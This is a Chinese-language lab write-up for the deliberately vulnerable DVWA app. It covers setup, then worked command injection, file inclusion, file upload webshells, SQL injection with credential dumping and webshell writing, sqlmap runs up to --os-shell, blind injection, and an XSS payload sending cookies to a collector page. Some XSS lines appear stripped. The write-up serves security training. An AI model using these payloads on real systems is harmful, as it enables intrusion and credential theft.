DVWA测试Writeup
一、下载 配置DVWA
wget https://github.com/ethicalhack3r/DVWA/archive/master.zip或http://www.dvwa.co.uk/mv master.zip /var/www/html/rm -r DVWA-master/unzip master.zip
二、环境配置
service apache2 stop
chmod -R 777 /var/www/html/DVWA-master
service mysql start
mysql -u root -p 打开mysql
create database dvwa;
exit 退出mysql
service apache2 start
vi /var/www/html/DVWA-master/config/config.inc.php.dist 更改dvwa配置文件
cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.php rm /var/www/html/DVWA-master/config/config.inc.php.dist
apt-get install php-mysql php php-pear 安装环境(kali 2018.1 亲测有效) 
如果下面出现这些问题的话;
问题:PHP function allow_url_include: Disabled
处理:编缉 /php.ini将allow_url_include值由Off改为On
vi /etc/php/7.0/apache2/php.ini
奈何还是不行;于是找到所有php.ini都改了一遍
vi /etc/php/7.2/apache2/php.ini
vi /var/www/html/DVWA-master/php.ini
问题:PHP module gd: Missing
处理:apt-get install php7.0-gd
注意这是7.0的版本哦,安装7.2的提示依然不成功
问题:reCAPTCHA key: Missing
处理:编缉dvwa/config/config.inc.php
配置$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
配置$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
问题:Unable to connect to the database
处理:编缉dvwa/config/config.inc.php,将$_DVWA[ 'db_password' ]的值改成自己设的数据库root账号的密码,然而亲测并不行,翻翻dvwa帮助文档,发现这个,全是坑啊。。。
先以root登录;
exit,用dvwa登录;
大功告成;贴图一张以示纪念;
三、实战演练
1、暴力破解
high等级:如何自动获取usertoken参数
2、命令注入:
判断:
是否调用系统命令
函数或参数是否可控
可控参数是否能够拼接命令
拼接:ping 127.0.0.1&&net user
中等难度:ping 127.0.0.1&net user
高等难度:ping 127.0.0.1|net user
TIPS:A&B 简单的拼接
A&&B A执行成功,然后才会执行B
A|B A的输出作为B的输入
A||B A执行失败才会执行B
技巧:
如果过滤了黑名单怎么办
windows:
who""ami
who""am""i
linux:
who''am''i
如果没有回显怎么办
延时注入:
Windows:
ping 127.0.0.1 -n 5>nul
linux“
sleep 5
3、CSRF
中等难度:referer包含host
高等难度:csrf_token针对攻击者未知
4、文件包含:
文件名参数用户可控且过滤不严,被攻击者替换为恶意代码,达到代码执行的目的
php设置
开启allow_url_include&
爆出网站路径:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=test.php
C:\phpStudy\WWW\DVWA\vulnerabilities\fi\index.php
测试文件包含:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=../../phpinfo.php
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=../../../phpinfo.txt(包含PHP代码即执行)
中等:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=..\..\..\phpinfo.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=http://..\..\..\phpinfo.txt(神奇绕过)
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=httphttp://://192.168.126.128:8081/phpinfo.txt
高等:
爆出网站路径:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file1111.php
利用file协议绕过:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file://C:\phpStudy\WWW\phpinfo.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file:///../../../phpinfo.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file:///../../../../../1.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file://c:/1.txt
TIPS:file协议不能远程执行代码,需要配合文件上传漏洞,上传php文件进行本地包含
5、文件上传:
概念:web允许用户上传恶意代码文件,并执行
函数:upload("hello.php")
测试:http://192.168.126.128:8081/DVWA//hackable/uploads/2p.jpg
low:http://192.168.126.128:8081/DVWA/hackable/uploads/shell.php
http://192.168.126.128:8081/DVWA/hackable/uploads/shell.php?cmd=system('ipconfig');
http://192.168.126.128:8081/DVWA/hackable/uploads/shell.php?cmd=system('type c:\\windows\\win.ini');
medium:Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpeg
high:不仅限制类型,还限制大小
制作内涵图片
copy C:\Users\Administrator\Desktop\2.jpg/b+C:\Users\Administrator\Desktop\2.txt/a C:\Users\Administrator\Desktop\3.jpg
利用文件包含:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file://C:\phpstudy\www\DVWA\hackable\uploads\3.jpg
利用nginx解析漏洞:cgi.fix_pathinfo=1
http://192.168.126.128:8081/DVWA//hackable/uploads/2.jpg
http://192.168.126.128:8081/DVWA//hackable/uploads/2.jpg/2.php 成功以php格式执行
修复:
阻止非法文件上传
文件后缀名白名单
文件类型匹配
文件内容头部的判断
阻止非法文件执行
文件重命名
文件压缩重新生成
存储目录执行权限设置
存储目录与web分离
6、sql注入:
命令注入:系统命令
sql注入:sql语句,操作数据库
sql回显注入:将注入结果回显到页面
low:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/? id=1' or '1'='1
&Submit=Submit#
TIPS:三种MySQL注释符
#忽略
常编码为%23
-- 忽略
短线短线空格
/*忽略*/
诸如中常用来作为空格
确定查询字段数
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=1' order by 2--
&Submit=Submit#
确定回显点:1,2均回显
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ 1,2-- +
&Submit=Submit#
小试牛刀:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ version(),@@datadir-- +
&Submit=Submit#
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ user(),database()-- +
&Submit=Submit#
查询表名:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ 1,table_name from information_schema.tables where table_schema='dvwa'-- +
&Submit=Submit#
查询列名:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ 1,column_name from information_schema.columns where table_name='user'-- +
&Submit=Submit#
查询用户名和密码:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ user,password from users-- +
&Submit=Submit#
获取电脑信息:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ load_file('c"\\phpinfo.txt'),load_file('c:\\windows\\win.ini')-- +
&Submit=Submit#
报网站路径:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ "xx","xx" into outfile 'xx'-- +
&Submit=Submit#
C:\phpStudy\WWW\DVWA\vulnerabilities\sqli\source\low.php
写webshell:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?
id=xx' +union+ select+ "","webshell" into outfile 'C:\\phpStudy\\WWW\\DVWA\\cmd.php'-- +
&Submit=Submit#
执行webshell:
http://192.168.126.128:8081/DVWA/cmd.php?cmd=system('dir');
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5"
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --current-user --current-db
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" -D dvwa --tables
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" -D dvwa -T users --columns
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" -D dvwa -T users -C "user,password" --du
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --os-shell
C:\phpStudy\WWW\DVWA
medium:单引号转义
post提交方式
tamper data 修改id
确定注入poc:
id=1 or 1=1 √
id=1" or "1"="1 ×
id=1' or '1'='1 ×
tips:利用hex编码绕过单引号转义
id=1 union select 1,table_name from information_schema.tables where table_schema='dvwa' ×
id=1 union select 1,table_name from information_schema.tables where table_schema=0x64767761 √
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/ --data "id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5"
high:注入点和返回点不在同一页面
poc:id=1' or '1'='1'--
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit#" -p "id" --cookie "security=high;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --second-order "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/" 
修复:
参数化sql语句
预编译绑定id变量
用户输入过滤
白名单
7、sql盲注:
概念:数据库的执行结果不会直接显示到页面上,页面只会显示真和假两种状态
分类:
布尔型
三种注入poc:真 and 假=假
id=1 and 1=2
id=1' and '1'='2
id=1" and "1"="2
盲注思路:
1' and 真 ture
1' and 假 false
sql函数:
猜解长度:
length(str);
获取字符串:
subtra(expression,start,length)
获取第一个字符的ASCII值(0-127)
ascii(string)
确定字符串长度:
1' and length(database())>4 --
获取字符串:
1' and ascii(substr(database(),1,1))>64 --
char=100, d
1' and ascii(substr(database(),2,1))>64 --
v
1' and ascii(substr(database(),3,1))>64 --
w
1' and ascii(substr(database(),4,1))>64 --
a
database()='dvwa'
延时型:
sql函数:
if(expr1,expr2,expr3)
如果expr1为真,取expr2,否则取expr3
sleep(N)
休眠N秒
benchmark(count,expr)
重复计算,count为次数
判断长度:
1' and sleep(if(length(database())=4,5,0))--
结果为真,5秒返回
1' and sleep(if(length(database())=5,5,0))--
结果为假,立即返回
或
1' and benchmark(if(length(database())=4,500000,0),md5('test'));--
重复执行500000次md5方法,消耗1s
1' and benchmark(if(length(database())=5,500000,0),md5('test'));--
直接返回
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --current-db -v 3
函数:
cast(expression as data_type)
数字类型转换,十六进制转换为字符串
ifnull(expr1,expr2)
如果expr1是null,返回expr2,否则返回expr1本身
select ifnull(null,'test');
返回test
select ifnull(cast(database()as char),0x20);
返回dvwa
mid(expr,start,length)
获取子字符串
ord(string)
获取第一个字符的ASCII值
select ord(mid(database(),1,1));
返回100
思路:
1' and ord(mid((ifnull(cast(database()as char),0x20)),1,1))>64 and 1'='1
midium:
tamper改包:1 and 1=2
high:id在cookie中
1’ and '1'='2' --
sqlmap:level>=2 ---cookie注入
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli_blind/? -p "id" --cookie "id=1;security=high;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --level 2
8、XSS攻击:
存储型XSS:攻击代码在数据库里,输出在HTTP响应中
反射型XSS:攻击代码在url里,输出在HTTP响应中
DOM型XSS:攻击代码在url里,输出在DOM节点里
JavaScript弹窗函数:
alert()
confirm()
prompt()
反射型XSS:
low:
测试:name=
构造本地服务器,接收cookie
cookie.php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>
构造js:
name=
url编码:
name=%3Cscript%3Edocument.localtion%3D%27http%3A%2f%2f192.168.126.128%3A8081%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E
获取cookie
medium:
name=
name=
high:
name=
name=